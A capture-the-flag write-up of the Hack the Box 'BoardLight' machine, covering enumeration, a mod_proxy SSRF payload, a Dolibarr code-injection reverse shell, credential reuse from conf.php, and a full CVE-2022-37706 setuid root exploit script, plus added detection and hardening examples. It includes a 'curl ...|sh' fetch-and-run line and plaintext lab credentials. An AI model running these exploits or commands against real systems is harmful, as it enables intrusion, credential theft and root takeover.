Writeup | Hack the Box: BoardLight

Publishing this now that Season 5 is over. It was my first season, so I only managed the EASY box, but I got through it with what I already knew.

echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

nmap

nmap -sC -A board.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)

Standard setup: just SSH and Apache.

Web

There's a commented-out page in the HTML source.

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ.php

about   [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 172ms]
contact [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 164ms]
do      [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 291ms]
index   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 160ms]

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ

.htaccess     [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
.hta          [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
              [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 309ms]
.htpasswd     [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 157ms]
css           [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 157ms]
images        [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 156ms]
index.php     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 2280ms]
js            [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 156ms]
server-status [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 165ms]

Apache 2.4.41 => CVE-2021-40438 (mod_proxy SSRF)?

whatweb -a 3 http://board.htb

http://board.htb [200 OK] Apache[2.4.41], Bootstrap[4.3.1], Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]

The payload shape is this:

GET http://board.htb/?unix:AA...AAAA|http://127.0.0.1:3000/

Run it from a Python PoC. Caveat: CVE-2021-40438 is only reachable when mod_proxy is loaded and a ProxyPass rule actually forwards the request; the 2.4.41 banner alone doesn't establish that.

python3 CVE-2021-40438.py -t http://board.htb -ssrf http://10.10.16.22:8000 | head
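To make the request shape above concrete from both sides, here is an added example (my own code, not the PoC script the writeup runs): one function builds the `?unix:AAA...|http://backend` query, the other scans Apache access-log lines for that shape. The padding length 7701 is the value public PoCs use (assumption: anything past mod_proxy's socket-path length limit behaves the same), the 64-character detection threshold is an arbitrary choice, and the log lines are constructed, not real traffic.

```python
import re

# Added example, not from the original writeup.
# CVE-2021-40438: if a "unix:<path>|<url>" request carries a socket path longer
# than mod_proxy accepts, the socket part is dropped and the URL after "|" is
# used as the backend the proxy connects to, which is the SSRF.
PAD_LEN = 7701  # padding length used by public PoCs (assumption)


def build_ssrf_query(target_url: str, pad_len: int = PAD_LEN) -> str:
    """Return the query string asking mod_proxy to fetch target_url."""
    return "unix:" + "A" * pad_len + "|" + target_url


# Detection side: 64 non-'|' characters after "unix:" is an assumed threshold;
# real payloads carry thousands, so tune it to your own traffic.
_SSRF_RE = re.compile(r"\?unix:[^|\s]{64,}\|(?P<backend>https?://\S+)")


def find_ssrf_attempts(log_lines):
    """Return [(client_ip, backend_url)] for log lines matching the payload shape."""
    hits = []
    for line in log_lines:
        m = _SSRF_RE.search(line)
        if m:
            client = line.split(" ", 1)[0]  # first field of Apache combined format
            hits.append((client, m.group("backend")))
    return hits


# Constructed sample log lines in Apache combined format (not captured traffic).
SAMPLE_LOG = [
    '10.10.16.22 - - [25/Jun/2024:03:12:56 +0000] "GET /?'
    + build_ssrf_query("http://127.0.0.1:3000/")
    + ' HTTP/1.1" 200 15949',
    '10.10.16.22 - - [25/Jun/2024:03:12:57 +0000] "GET /index.php HTTP/1.1" 200 15949',
]

if __name__ == "__main__":
    for client, backend in find_ssrf_attempts(SAMPLE_LOG):
        print(f"{client} asked the proxy to fetch {backend}")
```

Whether the request does anything on the target still depends on a ProxyPass rule existing; the builder only produces the request, and the detector only flags its shape.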

Subdomain enumeration

The site mentions board.htb, so maybe there are subdomains too?

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.board.htb" -u http://board.htb/ -fs 15949

crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6241ms]

There it is.

echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

crm.board.htb is Dolibarr => CVE-2023-30253 (PHP code injection through the website module; needs a login, and admin/admin works here)

Current login: admin

nc -lnvp 4444

python3 exploit.py http://crm.board.htb admin admin 10.10.16.22 4444

yessss!
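The bug the exploit above relies on is a filter that was meant to stop PHP from being saved into website pages but only matched a lowercase `<?php`, so `<?PHP ... ?>` got through and ran on render. As an added example (my own illustration, not Dolibarr's code or the exploit script), here is that check next to a hardened one, run over constructed payloads:

```python
import re

# Added example modelled on the bug class behind CVE-2023-30253 (Dolibarr
# website module). Illustration only, not Dolibarr's own source.


def vulnerable_reject_php(source: str) -> bool:
    """True if the page body is rejected. Case-sensitive, so '<?PHP' passes."""
    return "<?php" in source


def hardened_reject_php(source: str) -> bool:
    """Case-insensitive and also catches the '<?=' echo tag."""
    return re.search(r"<\?(?:php\b|=)", source, re.IGNORECASE) is not None


# Constructed payloads; "uppercase" is the shape public PoCs for this CVE use.
PAYLOADS = {
    "plain html": "<h1>About us</h1>",
    "lowercase":  "<?php system('id'); ?>",
    "short echo": "<?= shell_exec('id') ?>",
    "uppercase":  "<?PHP system('id'); ?>",
}


def compare_checks():
    """Map payload name -> (rejected by vulnerable check, rejected by hardened check)."""
    return {name: (vulnerable_reject_php(p), hardened_reject_php(p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in compare_checks().items():
        print(f"{name:11s} vulnerable rejects={vuln!s:5s} hardened rejects={hard}")
```

Even the hardened regex is only a denylist (a bare `<?` with short_open_tag enabled still slips past it); the robust fix is to never let content a web user can edit reach the PHP interpreter at all.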

www-data@boardlight:/html/crm.board.htb/htdocs/public/website$ pwd
/var/www/html/crm.board.htb/htdocs/public/website
www-data@boardlight:/html/crm.board.htb/htdocs/public/website$ whoami
www-data

www-data@boardlight:~$ ls -la /home
total 12
drwxr-xr-x  3 root    root    4096 May 17 01:04 .
drwxr-xr-x 19 root    root    4096 May 17 01:04 ..
drwxr-x--- 16 larissa larissa 4096 Jun 25 03:33 larissa

larissa looks like the user, but www-data can't get into that home directory (drwxr-x---, no access for others).

linpeas

Look for files www-data can reach.

Host it from the attacking machine:

python3 -m http.server 8000

curl http://10.10.16.22:8000/linpeas.sh|sh

Lots of files owned by larissa.

www-data@boardlight:~/html/board.htb$ ls -la
total 72
drwxr-xr-x 5 www-data www-data  4096 May 17 01:04 .
drwxr-xr-x 4 www-data www-data  4096 May 17 01:04 ..
-rw-rw-r-- 1 larissa  larissa   9100 May 15 11:01 about.php
-rw-rw-r-- 1 larissa  larissa   9426 May 15 11:02 contact.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 css
-rw-rw-r-- 1 larissa  larissa   9209 May 15 11:02 do.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 images
-rw-rw-r-- 1 larissa  larissa  15949 May 15 11:02 index.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 js

MySQL looks to be up (bound to localhost only).

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -

Backup file => nothing useful in it.

-r-------- 1 www-data www-data 16394 May 13 13:20 /var/www/html/crm.board.htb/htdocs/conf/conf.php.old

www-data@boardlight:/html/crm.board.htb/htdocs/conf$ ls -la
total 56
drwxr-xr-x  2 www-data www-data  4096 May 17 00:18 .
drwxr-xr-x 79 www-data www-data  4096 Mar  4  2023 ..
-rw-r--r--  1 www-data www-data    31 Mar  4  2023 .htaccess
-rw-r--r--  1 www-data www-data  1736 May 17 00:18 conf.php
-rw-r--r--  1 www-data www-data 16394 Mar  4  2023 conf.php.example
-r--------  1 www-data www-data 16394 May 13 13:20 conf.php.old
www-data@boardlight:/html/crm.board.htb/htdocs/conf$ pwd
/var/www/html/crm.board.htb/htdocs/conf

conf.php (the live Dolibarr config, world-readable) holds the DB credentials:

$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

MySQL

serverfun2$2023!!

mysql -u dolibarrowner -p dolibarr

Account table

SHOW TABLES; => llx_user

SELECT * FROM llx_user\G

*************************** 1. row ***************************
       rowid: 1
         ...
       login: dolibarr
pass_crypted: $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
   pass_temp: NULL
     api_key: NULL
    lastname: SuperAdmin
*************************** 2. row ***************************
       rowid: 2
         ...
       login: admin
pass_crypted: $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
   pass_temp: NULL
     api_key: yr6V3pXd9QEI
    lastname: admin

Try cracking the bcrypt hash (mode 3200). Single-quote it, otherwise the shell expands the `$2y` and `$10` parts:

hashcat -m 3200 '$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96'

=> failed, no crack.

user

The hash didn't crack, but the DB password from conf.php is reused for larissa's SSH login:

ssh larissa@board.htb
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
larissa@board.htb's password:
Last login: Tue Jun 25 03:12:56 2024 from 10.10.14.116
larissa@boardlight:~$

larissa@boardlight:~$ cat user.txt XXXX

linpeas again

larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$ sudo -l
[sudo] password for larissa:
Sorry, user larissa may not run sudo on localhost.

Looking at the earlier linpeas output again:

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

enlightenment_sys looks suspicious.

Enlightenment => the box is called BoardLight, so this is probably the intended path.

Work through the CVE-2022-37706 PoC steps in order.

check

larissa@boardlight:~/tmp$ file /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c32a8a1b279ba209d1029c51435d64b86ca09b8b, for GNU/Linux 3.2.0, stripped

Running it with no arguments gives no output => OK

larissa@boardlight:/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
larissa@boardlight:/tmp$

help => OK

larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys --help
This is an internal tool for Enlightenment.
do not use it.

strace

larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep open
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeina.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libecore.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbluetooth.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librt.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsystemd.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind-x86_64.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeo.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libefl.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libglib-2.0.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblz4.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcrypt.so.20", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgpg-error.so.0", O_RDONLY|O_CLOEXEC) = 3

strace exec

larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep exec
execve("/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", ["/usr/lib/x86_64-linux-gnu/enligh"...], 0x7ffc29275890 /* 18 vars */) = 0

The execve succeeds. Keep in mind that a setuid binary traced with strace runs without its setuid privilege (the kernel won't grant root to a ptraced process), so this only shows the unprivileged code path.

larissa@boardlight:~/tmp$ cat ex.sh
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
    echo "[-] Couldn't find the vulnerable SUID file..."
    echo "[*] Enlightenment should be installed on your system."
    exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

larissa@boardlight:~/tmp$ sh ex.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
ex.sh: 8: [[: not found
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.

Two things in that output are expected. `[[: not found` is because a bash script was run with `sh` (dash on Ubuntu); the `if` body is simply skipped and the script carries on, so run it with `bash ex.sh` (or change the test to `[ -z "${file}" ]`) if you want the check to work. The mount error is the exploit working: enlightenment_sys passes the "/dev/../tmp/;/tmp/exploit" argument through a shell, so the `;` ends the mount command early (hence the fstab complaint) and /tmp/exploit runs next as root, which is the shell you land in.

whoami

root

cd /root/

ls

root.txt snap

cat root.txt

XXXX

got it!
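To show the bug class behind the enlightenment_sys privesc without the real binary, here is an added example (my own illustration, not enlightenment's source or the PoC): a setuid-style helper that only checks that the mount source starts with `/dev/` and then glues it into a shell command, next to a version that normalises the path, refuses shell metacharacters, and hands an argument vector to the program instead of a string to a shell. The allowed prefix and option list are assumptions chosen for the example.

```python
import os
import re

# Added example modelled on CVE-2022-37706 as used in this writeup; it is not
# enlightenment_sys's own code. ALLOWED_PREFIXES and the mount options are
# assumptions for illustration.
ALLOWED_PREFIXES = ("/dev/",)
SHELL_META = re.compile(r"[;&|`$(){}<>\n\s]")
EXPLOIT_PATH = "/dev/../tmp/;/tmp/exploit"   # the argument the PoC above passes


def vulnerable_path_ok(path: str) -> bool:
    """Prefix test only: '/dev/../tmp/;/tmp/exploit' starts with /dev/, so it passes."""
    return path.startswith(ALLOWED_PREFIXES)


def vulnerable_command(path: str, target: str) -> str:
    """Command string the way a system()-style helper would build it.
    If this string reaches /bin/sh, the ';' inside path starts a second command."""
    return f"/bin/mount -o noexec,nosuid {path} {target}"


def hardened_path_ok(path: str) -> bool:
    """Reject shell metacharacters, then check the prefix on the normalised path
    (so '/dev/../tmp' is seen as '/tmp'). normpath rather than realpath keeps the
    check deterministic offline; a real helper should also resolve symlinks."""
    if SHELL_META.search(path):
        return False
    canonical = os.path.normpath(path)
    return canonical.startswith(ALLOWED_PREFIXES)


def hardened_command(path: str, target: str) -> list:
    """Argument vector for execv/subprocess.run: no shell ever parses it, so a ';'
    in path is just part of a filename mount will fail to find."""
    return ["/bin/mount", "-o", "noexec,nosuid", path, target]


if __name__ == "__main__":
    print("vulnerable check accepts:", vulnerable_path_ok(EXPLOIT_PATH))
    print("shell would see         :", vulnerable_command(EXPLOIT_PATH, "/tmp///net"))
    print("hardened check accepts  :", hardened_path_ok(EXPLOIT_PATH))
    print("hardened argv           :", hardened_command("/dev/sdb1", "/tmp/net"))
```

The two fixes are independent: even with a perfect path check, building a shell string is the wrong primitive for a setuid helper, and even with execv, `..` components have to be resolved before an allowlist prefix means anything.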